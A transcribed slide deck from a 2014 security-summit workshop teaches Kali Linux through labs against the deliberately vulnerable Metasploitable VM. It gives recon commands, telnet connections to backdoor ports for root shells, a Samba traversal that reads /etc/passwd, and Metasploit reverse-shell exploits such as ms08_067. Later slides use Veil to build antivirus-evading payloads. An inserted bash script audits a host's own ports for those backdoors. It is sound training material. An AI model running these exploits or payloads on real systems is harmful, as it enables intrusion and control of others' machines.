kali linux - falconer - iss 2014

What is Kali Linux? Information Security Summit 2014 Westlake, Ohio

Upload: tgodfrey

Post on 08-Jul-2015


DESCRIPTION

This is a presentation and how-to I gave at the Information Security Summit 2014.

TRANSCRIPT

Page 1: Kali Linux - Falconer - ISS 2014

What is Kali Linux?

Information Security Summit 2014

Westlake, Ohio

Page 2: Kali Linux - Falconer - ISS 2014

Welcome to ISS 2014

Page 3: Kali Linux - Falconer - ISS 2014

Welcome

Tony Godfrey is the CEO / Linux Consultant of Falconer Technologies (est 2003) specializing in Linux. He has written several articles on the body of knowledge of security administration, is a regular contributor to a variety of Linux publications, and has written technical content for Linux education nation-wide at the college level.

He also teaches topics covering Linux, Network Security, Cisco routers, Cybercrime and System Forensics.

Page 4: Kali Linux - Falconer - ISS 2014

Welcome

Side Note:

I put a lot of extra materials, websites, & definitions in the ‘Notes’ section of this PPT.

Page 5: Kali Linux - Falconer - ISS 2014

Overview of Presentation

Intro, Description, How used, Background

Extra Info, Kali in a Box, Raspberry PI

Tools, Overview, & Conclusion

Setting up the Environments

CLI 101 / Tools 101

Kali 101, 201, & 301

Page 6: Kali Linux - Falconer - ISS 2014

Presentation on Kali Linux

Intro

Page 7: Kali Linux - Falconer - ISS 2014

Who or What is ‘Kali’?

Page 8: Kali Linux - Falconer - ISS 2014

Who is Kali?

Kali the mother goddess despite her fearful appearance, protects the good against the evil. Unlike the other Hindu deities her form is pretty scary and formidable, intended to scare away the demons both literally and figuratively!

Anu Yadavalli

Page 9: Kali Linux - Falconer - ISS 2014

Hindu Kali

Page 10: Kali Linux - Falconer - ISS 2014

What is Kali Linux?

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution.

Page 11: Kali Linux - Falconer - ISS 2014

BackTrack?

Kali Linux is the ‘rebirth’ of BackTrack Linux. This is a custom distribution designed for security testing for all skill levels from novice to expert. It is the largest collection of wireless hacking, server exploiting, web application assessing, and social-engineering tools available in a single Linux distribution.

Page 12: Kali Linux - Falconer - ISS 2014

Developers - March 12, 2013

“Seven years of developing BackTrack Linux has taught us a significant amount about what we, and the security community, think a penetration testing distribution should look like. We’ve taken all of this knowledge and experience and implemented it in our “next generation” penetration testing distribution.”

Page 13: Kali Linux - Falconer - ISS 2014

Developers - March 12, 2013

“After a year of silent development, we are incredibly proud to announce the release and public availability of “Kali Linux“, the most advanced, robust, and stable penetration testing distribution to date.

Kali is a more mature, secure, and enterprise-ready version of BackTrack Linux.”

Page 14: Kali Linux - Falconer - ISS 2014

Warning!

Kali Linux’s developers would like everyone to use Kali Linux. But Kali is a Linux distribution specifically geared towards professional penetration testing and security auditing and, as such, it is NOT a recommended distribution for those unfamiliar with Linux.

Page 15: Kali Linux - Falconer - ISS 2014

Hardware / Software

Kali likes its own dedicated hardware. If you are learning about Kali and penetration testing (Metasploitable), then a virtualized environment may be a consideration. VMware Player 5 works well; set the RAM to 1 GB.

Page 16: Kali Linux - Falconer - ISS 2014

Hardware / Software

Kali recommends 10 GB for the initial install, 512 MB RAM minimum, i386/AMD64, and CD/DVD / USB support.

Now… add 10 GB if ‘Veil’ is installed and 5 GB for the updates/upgrades, and don’t forget the Alfa antenna.

Page 17: Kali Linux - Falconer - ISS 2014

http://www.kali.org/

Page 18: Kali Linux - Falconer - ISS 2014
Page 19: Kali Linux - Falconer - ISS 2014
Page 20: Kali Linux - Falconer - ISS 2014

Other guys?

Page 21: Kali Linux - Falconer - ISS 2014

Other guys? BackBox

BackBox is an Ubuntu-based distribution developed to perform penetration tests and security assessments. It provides a minimal yet complete desktop environment, thanks to its own software repositories, which are always updated to the latest stable versions of the most often used and best-known ethical hacking tools.

Page 22: Kali Linux - Falconer - ISS 2014

Other guys? Pentoo

Pentoo is a Live CD/USB designed for penetration testing and security assessment. Based on Gentoo, it is provided as both a 32-bit and a 64-bit installable live CD. It features packet-injection-patched wifi drivers, GPGPU cracking software, and lots of tools for penetration testing and security assessment.

Page 23: Kali Linux - Falconer - ISS 2014

Other guys? BlackBuntu

BlackBuntu is a distribution for penetration testing which was specially designed for security training students and practitioners of information security. BlackBuntu is a penetration testing distribution with the GNOME Desktop Environment. It's currently being built using Ubuntu 10.10.

Page 24: Kali Linux - Falconer - ISS 2014

Other guys? EnGarde

EnGarde Secure Linux was designed to support features suitable for individuals, students, security enthusiasts, and those wishing to evaluate the level of security and ease of management available in Guardian Digital enterprise products.

Page 25: Kali Linux - Falconer - ISS 2014

Other guys? A few more….

Page 26: Kali Linux - Falconer - ISS 2014

Presentation on Kali Linux

Categories & Websites

Page 27: Kali Linux - Falconer - ISS 2014

What’s in the box, Pandora?

Page 28: Kali Linux - Falconer - ISS 2014

There are several categories

Top 10 Security Tools

Information Gathering

Vulnerability Analysis

Web Applications / Password Attacks

Wireless Attacks / Exploitation Tools

Sniffing/Spoofing / Maintaining Access

Reverse Engineering

Stress Testing / Hardware Hacking

Forensics / Reporting Tools

System Services

Page 29: Kali Linux - Falconer - ISS 2014

Metapackages also exist

Page 30: Kali Linux - Falconer - ISS 2014

Kali Information

See ‘Notes’ section in this slide

Page 32: Kali Linux - Falconer - ISS 2014

Kali & More PenTesting

See ‘Notes’ section in this slide

Page 34: Kali Linux - Falconer - ISS 2014

Kali-specific Websites

See ‘Notes’ section in this slide

Page 36: Kali Linux - Falconer - ISS 2014

Kali Publications

See ‘Notes’ section in this slide

Page 38: Kali Linux - Falconer - ISS 2014

Kali in a box?

Do you want to run Kali on a tablet or phone?

http://www.kali.org/how-to/kali-linux-android-linux-deploy/

Page 39: Kali Linux - Falconer - ISS 2014

Kali in a box?

Basically….

1. Get a tablet
2. Install ‘Linux Deploy’
3. Install Samsung Kies on PC
4. Tablet - USB Debugging ON
5. Install SuperOneClick on PC
6. Wait 5 minutes…
7. Done

Page 40: Kali Linux - Falconer - ISS 2014

Kali + Nexus = NetHunter

Do you want to run Kali on a Nexus?

http://www.kali.org/kali-linux-nethunter/

Page 41: Kali Linux - Falconer - ISS 2014

Kali on a Nexus?

Page 42: Kali Linux - Falconer - ISS 2014

Kali & Lifehacker

How to hack your own network and beef up its security with Kali Linux

http://lifehacker.com/how-to-hack-your-own-network-and-beef-up-its-security-w-1649785071

Page 43: Kali Linux - Falconer - ISS 2014

Kali & Raspberry PI

See ‘Notes’ section in this slide

Page 44: Kali Linux - Falconer - ISS 2014
Page 45: Kali Linux - Falconer - ISS 2014
Page 46: Kali Linux - Falconer - ISS 2014

What is Metasploitable?

See ‘Notes’ section in this slide

Page 47: Kali Linux - Falconer - ISS 2014

Metasploitable?

Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.

The default login and password is msfadmin:msfadmin.

Page 48: Kali Linux - Falconer - ISS 2014

Presentation on Kali Linux

DVD, Tools, Demo

Page 49: Kali Linux - Falconer - ISS 2014

What’s on the DVD?

/books
◦ Official Kali Guide
◦ eForensics
◦ Other published materials

/media
◦ 7-Zip, kali_iso, metaspolitable doc, SD_formatter, Unetbootin, USB_installer, VMware, Win32_DiskImager

/PPT

Page 50: Kali Linux - Falconer - ISS 2014

Legend

We’re going to type something

We’re going to make a note

Might be a question?

We’re going to click on something

Recon Attack

Page 51: Kali Linux - Falconer - ISS 2014

traceroute

traceroute

Essentially, ‘tracert’ in Windows

traceroute -i eth0 <Target IP>

It displays the route (path) and measures the transit delays of packets across an Internet Protocol (IP) network.

Page 52: Kali Linux - Falconer - ISS 2014

nmap

nmap -p0-65535 <Target IP> | less

A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network

Page 53: Kali Linux - Falconer - ISS 2014

nmap

nmap -sS -Pn -A <Target IP>

A security scanner used to discover hosts and services on a computer network – ‘sS’ is a stealth scan, ‘Pn’ skips the ping scan, and ‘A’ is O/S detection, services, service pack.

Page 54: Kali Linux - Falconer - ISS 2014

rpcinfo

rpcinfo -p <Target IP>

A utility that makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host.

Page 55: Kali Linux - Falconer - ISS 2014

tcpdump

On Kali…

tcpdump -i eth0 src <Target IP>

On Metasploitable…

ping www.yahoo.com

open a browser & go to CNN.com

Page 56: Kali Linux - Falconer - ISS 2014

nikto

On Kali

nikto -h <Target IP>

It's an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers.

Page 57: Kali Linux - Falconer - ISS 2014

whatweb

From Kali

whatweb <Target IP>

whatweb -v <Target IP>

whatweb -a 4 <Target IP>

WhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.

Page 58: Kali Linux - Falconer - ISS 2014

Zenmap

Let’s run Zenmap

Applications Kali Linux

Information Gathering

DNS Analysis

Zenmap

Page 59: Kali Linux - Falconer - ISS 2014

SHODAN

Let’s run SHODAN

Open a browser

www.shodanhq.com

type in ‘almost anything’

…Be very nervous…

Page 60: Kali Linux - Falconer - ISS 2014

dmitry

If you want something more basic…dmitry

dmitry -s <domain.com>

It gives you site names & IP’s

Page 61: Kali Linux - Falconer - ISS 2014

Presentation on Kali Linux

Final Thoughts

Page 62: Kali Linux - Falconer - ISS 2014
Page 63: Kali Linux - Falconer - ISS 2014

Thank you

Thank you for your time.

Falconer Technologies

[email protected]

877 / TUX RULZ or 877 / 889-7859

Page 64: Kali Linux - Falconer - ISS 2014

Use your powers for good

Page 65: Kali Linux - Falconer - ISS 2014

Thank You

Page 66: Kali Linux - Falconer - ISS 2014

The second part of this slide deck covers more tools and hands-on.

Page 67: Kali Linux - Falconer - ISS 2014

Presentation on Kali Linux

Lab #1 & Prep

Page 68: Kali Linux - Falconer - ISS 2014

Getting Ready…

- Let’s make a folder called kali_2014

- Copy the DVD contents into that folder

- Install 7-Zip

- Install VMware Player

Let’s make sure the virtual environments are working and can ‘ping’ each other

Page 69: Kali Linux - Falconer - ISS 2014

VMware Player

Press <CTRL><Alt> at the same time to be released from the current virtual environment. You can then do a normal <Alt><Tab> to toggle between different applications.

Page 70: Kali Linux - Falconer - ISS 2014

Logins / Passwords

Kali Login: root
Kali Password: password

Metasploitable Login: msfadmin
Metasploitable Password: msfadmin

Download Metasploitable from: http://sourceforge.net/projects/metasploitable/

Page 71: Kali Linux - Falconer - ISS 2014

Metasploitable V/E

Login msfadmin Password msfadmin

ifconfig

Jot down the IP & Netmask

route

Jot down the Gateway

Page 72: Kali Linux - Falconer - ISS 2014

Metasploitable V/E

Virtual Environment #1
◦ Metasploitable

Go to TERMINAL

rlogin -l root <IP Address>

cd /tmp

ls -l ...vs... ls -la

rm .X0-lock

startx

Page 73: Kali Linux - Falconer - ISS 2014

Kali V/E

Login root Password password

ifconfig

Jot down the IP & Netmask

route

Jot down the Gateway

Page 74: Kali Linux - Falconer - ISS 2014

Kali V/E

Go to:

Applications System Tools Preferences System Settings Display Resolution: ____

Then…[Apply]

Page 75: Kali Linux - Falconer - ISS 2014

Kali Updating

From the command line, type

apt-get update && apt-get upgrade

Note: This has already been done to save time, but should be done after a new installation.

Page 76: Kali Linux - Falconer - ISS 2014

Presentation on Kali Linux

Lab #2 – Command Line Tools

Page 77: Kali Linux - Falconer - ISS 2014

Command Line Tools

Presentation on Kali Linux

Page 78: Kali Linux - Falconer - ISS 2014

Legend

We’re going to type something

We’re going to make a note

Might be a question?

We’re going to click on something

Recon Attack

Page 79: Kali Linux - Falconer - ISS 2014

ping

ping

Packet InterNet Groper

Port = 8

Establishes physical connectivity between two entities

(from Kali) ping <Target IP>

Did it echo back?

Page 80: Kali Linux - Falconer - ISS 2014

top

top

Tells us what services are running, processes, memory allocation

Basically, a live system monitor

Page 81: Kali Linux - Falconer - ISS 2014

df

df

Tells us how much space is available or ‘disk free’

Page 82: Kali Linux - Falconer - ISS 2014

du

du

Tells us how much space is taken or ‘disk used’.

You can get a shorter report by…

‘du -s’ … (disk used - summary)

Page 83: Kali Linux - Falconer - ISS 2014

free

free

How much ‘free’ memory is available

Page 84: Kali Linux - Falconer - ISS 2014

ls

ls

This is for ‘list’

ls -l (list - long)

ls -la (list - long - all attributes)

Page 85: Kali Linux - Falconer - ISS 2014

pwd

pwd

Directory structure

Means ‘path to working directory’ or ‘print working directory’

Page 86: Kali Linux - Falconer - ISS 2014

ps / ps aux / pstree

ps

Means ‘Process Status’
◦ aux – auxiliary view
◦ pstree – shows parent/child relationships
◦ Windows – tasklist / taskkill

Kill - Stops a process (ex: kill PID)

Page 87: Kali Linux - Falconer - ISS 2014

Presentation on Kali Linux

Lab #3 – CLI & Services

Page 88: Kali Linux - Falconer - ISS 2014

CLI & Services

Presentation on Kali Linux

Page 89: Kali Linux - Falconer - ISS 2014

traceroute

traceroute

Essentially, ‘tracert’ in Windows

traceroute -i eth0 <Target IP>

It displays the route (path) and measures the transit delays of packets across an Internet Protocol (IP) network.

Page 90: Kali Linux - Falconer - ISS 2014

nmap

nmap -p0-65535 <Target IP> | less

A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network

Page 91: Kali Linux - Falconer - ISS 2014

nmap

nmap -sS -Pn -A <Target IP>

A security scanner used to discover hosts and services on a computer network – ‘sS’ is a stealth scan, ‘Pn’ skips the ping scan, and ‘A’ is O/S detection, services, service pack.

Page 92: Kali Linux - Falconer - ISS 2014

rlogin (from Metasploitable)

rlogin -l root <Target IP>

whoami

tcpdump -i eth0 host <Target IP>

A packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.

Page 93: Kali Linux - Falconer - ISS 2014

rpcinfo

rpcinfo -p <Target IP>

A utility that makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host.

Page 94: Kali Linux - Falconer - ISS 2014

showmount

showmount -e <Target IP>

showmount -a <Target IP>

It displays a list of all clients that have remotely mounted a file system from a specified machine in the Host parameter. This information is maintained by the [mountd] daemon on the Host parameter.

Page 95: Kali Linux - Falconer - ISS 2014

telnet

telnet <Target IP> 21

After '220...'

user backdoored:)

<CTRL><]>

quit

Port 20/21 is FTP

Page 96: Kali Linux - Falconer - ISS 2014

telnet

telnet <Target IP> 6200

After 'Escape character...',

id;

<CTRL><]>

quit

Port 6200 - Oracle Notification Service remote port Oracle Application Server

Page 97: Kali Linux - Falconer - ISS 2014

telnet

telnet <Target IP> 6667

IRC (Internet Relay Chat)

Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP, Host Control, NetBus worm, ScheduleAgent, SubSeven, Trinity, WinSatan, Vampire, Moses, Maniacrootkit, kaitex, EGO.

Page 98: Kali Linux - Falconer - ISS 2014

telnet

telnet <Target IP> 1524

After 'root@meta....',

id

Many attack scripts install a backdoor shell at this port (especially those against Sun systems via holes in sendmail and RPC services like statd, ttdbserver, and cmsd). Connections to port 600/pcserver also have this problem. Note: ingreslock, Trinoo; talks UDP/TCP.
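
An added example, not part of the original slides: a defender-side check, run on a host you administer, for listeners on the ports the telnet slides above connect to (21, 6200, 6667, 1524). The function names and the sample `ss` output are constructed for illustration; the port notes paraphrase the slides.

```bash
#!/usr/bin/env bash
# Added example (not from the slides): audit a host you administer for
# listeners on the ports the telnet lab probes. Notes paraphrase the slides.

# Map a watched port to its note; return non-zero for any other port.
port_note() {
  case "$1" in
    21)   echo "FTP (slide: port 20/21 is FTP)" ;;
    1524) echo "ingreslock; attack scripts install backdoor shells here" ;;
    6200) echo "slide lists it as Oracle Notification Service remote port" ;;
    6667) echo "IRC; many trojans/backdoors also use this port" ;;
    *)    return 1 ;;
  esac
}

# Read `ss -tln` / `ss -tuln` style lines on stdin and print one
# tab-separated row per watched listener: port, bind address, scope, note.
flag_lab_ports() {
  awk '{ for (i = 1; i <= NF; i++) if ($i == "LISTEN") { print $(i + 3); next } }' |
  while read -r laddr; do
    port="${laddr##*:}"      # text after the last colon
    addr="${laddr%:*}"       # everything before it (IPv4, [::], or *)
    note="$(port_note "$port")" || continue
    case "$addr" in
      127.*|"[::1]") scope="loopback" ;;   # reachable only from the host itself
      *)             scope="exposed" ;;    # reachable from the network
    esac
    printf '%s\t%s\t%s\t%s\n' "$port" "$addr" "$scope" "$note"
  done | sort -n
}

# Constructed sample of `ss -tln` output (not captured from a real host).
sample_ss_output() {
  cat <<'EOF'
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128          0.0.0.0:22         0.0.0.0:*
LISTEN 0      32           0.0.0.0:21         0.0.0.0:*
LISTEN 0      5          127.0.0.1:6667       0.0.0.0:*
LISTEN 0      1            0.0.0.0:1524       0.0.0.0:*
LISTEN 0      128             [::]:80            [::]:*
EOF
}

# With --live, audit this machine; otherwise run on the constructed sample.
if [ "${1:-}" = "--live" ]; then
  ss -tln | flag_lab_ports
else
  sample_ss_output | flag_lab_ports
fi
```

A row marked `exposed` on 1524 or 6200 is the one to investigate first, since neither is a service an administrator normally starts on purpose.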

Page 99: Kali Linux - Falconer - ISS 2014

Presentation on Kali Linux

Lab #4 – Working w/Metasploitable

Page 100: Kali Linux - Falconer - ISS 2014

smbclient

smbclient -L //<Target IP>

msfconsole...wait, wait, wait..., then

use auxiliary/admin/smb/samba_symlink_traversal

set RHOST <Target IP>

set SMBSHARE tmp

Page 101: Kali Linux - Falconer - ISS 2014

smbclient

exploit

...Connecting to the server.....

...<yadda, yadda, yadda>...

...Auxiliary module....

At the prompt, type exit

Page 102: Kali Linux - Falconer - ISS 2014

smbclient

smbclient //<Target IP>/tmp

Do you get the 'smb: \>' prompt?

cd rootfs

cd etc

more passwd

Do you get a list of all user accts?

Page 103: Kali Linux - Falconer - ISS 2014

tcpdump

On Kali…

tcpdump -i eth0 src <Target IP>

On Metasploitable…

ping www.yahoo.com

open a browser & go to CNN.com

Page 104: Kali Linux - Falconer - ISS 2014

netdiscover

On Kali

netdiscover -i eth0 -r <Target IP>/24

Netdiscover is an active/passive address reconnaissance tool, mainly developed for those wireless networks without a DHCP server, when you are wardriving. It can also be used on hub/switched networks.

Page 105: Kali Linux - Falconer - ISS 2014

nikto

On Kali

nikto -h <Target IP>

It's an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers.

Page 106: Kali Linux - Falconer - ISS 2014

sqlmap

On Kali

sqlmap -u http://<Target IP> --dbs

It is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

Page 107: Kali Linux - Falconer - ISS 2014

Wasp Services

From Kali – open IceWeasel

http://<Target IP>/

Research: Mutillidae <p. 8>

The Mutillidae are a family of more than 3,000 species of wasps (despite the names) whose wingless females resemble large, hairy ants. Their common name ‘velvet ant’ refers to their dense pile of hair which most often is bright scarlet or orange, but may also be black, white, silver, or gold.

Page 108: Kali Linux - Falconer - ISS 2014

Web Services

From Kali – open IceWeasel

http://<Target IP>/

Research: Mutillidae <p. 8>

Mutillidae is a free, open source web application provided to allow security enthusiasts to pen-test and hack a web application.

Page 109: Kali Linux - Falconer - ISS 2014

whatweb

From Kali

whatweb <Target IP>

whatweb -v <Target IP>

whatweb -a 4 <Target IP>

WhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.

Page 110: Kali Linux - Falconer - ISS 2014

Presentation on Kali Linux

Lab #5 - msfconsole

Page 111: Kali Linux - Falconer - ISS 2014

From Kali - msfconsole

Presentation on Kali Linux

Page 112: Kali Linux - Falconer - ISS 2014

msfconsole

From Kali

service postgresql start

service metasploit start

msfconsole

Let’s fire up the database (PostgreSQL) – start Metasploit – start msfconsole

We will then take a look at the built-in exploit tools

Page 113: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console

help search

show exploits

search dns

‘Help Search’ shows all of the options, ‘Show Exploits’ shows all the built-in exploits in msfconsole, ‘Search DNS’ will look for any DNS exploits.

Page 114: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console

search Microsoft

search diablo

search irc

search http

Let’s try a few more to see what they do….

Page 115: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console, search for ‘unreal’

info <exploit>

use <exploit>

show options

LHOST, RHOST, LPORT, RPORT

Page 116: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console (ex: unreal)

set RHOST <IP Address>

show options

exploit

Page 117: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console, search for ‘twiki’

info <exploit>

use <exploit>

show options

LHOST, RHOST, LPORT, RPORT

Page 118: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console (ex: ‘twiki’)

set RHOST <IP Address>

show options

exploit

Page 119: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console, (target: Win XP)

use exploit/windows/smb/ms08_067_netapi

show options

show targets

set target 2

Page 120: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console, (target: Win XP)

show options

show advanced

show targets

show payloads

Page 121: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console, (target: Win XP)

set payload windows/shell_reverse_tcp

show options

set LHOST <Kali IP Address>

set RHOST <Target IP Address>

Page 122: Kali Linux - Falconer - ISS 2014

msfconsole

From [msf>] console, (target: Win XP)

show options

exploit

Any errors?

Page 123: Kali Linux - Falconer - ISS 2014

Presentation on Kali Linux

Lab #6 – more GUI

Page 124: Kali Linux - Falconer - ISS 2014

From Kali – more GUI

Presentation on Kali Linux

Page 125: Kali Linux - Falconer - ISS 2014

Zenmap

Let’s run Zenmap

Applications Kali Linux

Information Gathering

DNS Analysis

Zenmap

Page 126: Kali Linux - Falconer - ISS 2014

SHODAN

Let’s run SHODAN

Open a browser

www.shodanhq.com

type in ‘almost anything’

…Be very nervous…

Page 127: Kali Linux - Falconer - ISS 2014

FERN

Let’s run FERN

Kali Linux

Wireless Attacks

Wireless Tools

fern-wifi-cracker

Page 128: Kali Linux - Falconer - ISS 2014

recon-ng

Kali has many built-in tools, but because it is Debian-based you can always install more, such as recon-ng.

recon-ng

Automated info gathering and network reconnaissance.

Page 129: Kali Linux - Falconer - ISS 2014

recon-ng

Let’s run recon-ng…

cd /opt/recon-ng

/usr/bin/python recon-ng

show modules

recon/hosts/gather/http/web/google_site

Page 130: Kali Linux - Falconer - ISS 2014

recon-ng

Let’s run recon-ng…

set DOMAIN <domain.com>

run (…let this run awhile…)

back (…previous level…)

show modules

Page 131: Kali Linux - Falconer - ISS 2014

recon-ng

Let’s run recon-ng…

use reporting/csv

run

Will add your new information to

/usr/share/recon-ng/workspaces/default

Page 132: Kali Linux - Falconer - ISS 2014

dmitry

If you want something more basic…dmitry

dmitry -s <domain.com>

It gives you site names & IP’s

Page 133: Kali Linux - Falconer - ISS 2014

veil

Kali has many built-in tools, but because it is Debian-based you can always install even more, such as veil.

veil

Remote shell payload generator that can bypass many anti-virus programs.

Page 134: Kali Linux - Falconer - ISS 2014

veil

Let’s run veil

veil-evasion

list (available payloads list)

use 13 (powershell/VirtualAlloc)

generate

Page 135: Kali Linux - Falconer - ISS 2014

veil

Let’s run veil

1 (msfvenom)

[ENTER] (accept default)

Value for LHOST (Target IP)

Value for LPORT (ex: 4000)

Page 136: Kali Linux - Falconer - ISS 2014

veil

Let’s run veil

Output name (“Squatch”)

It will store this new batch file to the /usr/share/veil/output/source folder. When the file is run from the target machine, it will attempt to do a reverse shell session with Kali.

Page 137: Kali Linux - Falconer - ISS 2014

Presentation on Kali Linux

Final Thoughts

Page 138: Kali Linux - Falconer - ISS 2014
Page 139: Kali Linux - Falconer - ISS 2014

Thank you

Thank you for your time.

Falconer Technologies

[email protected]

877 / TUX RULZ or 877 / 889-7859

Page 140: Kali Linux - Falconer - ISS 2014

Use your powers for good

Page 141: Kali Linux - Falconer - ISS 2014

Thank You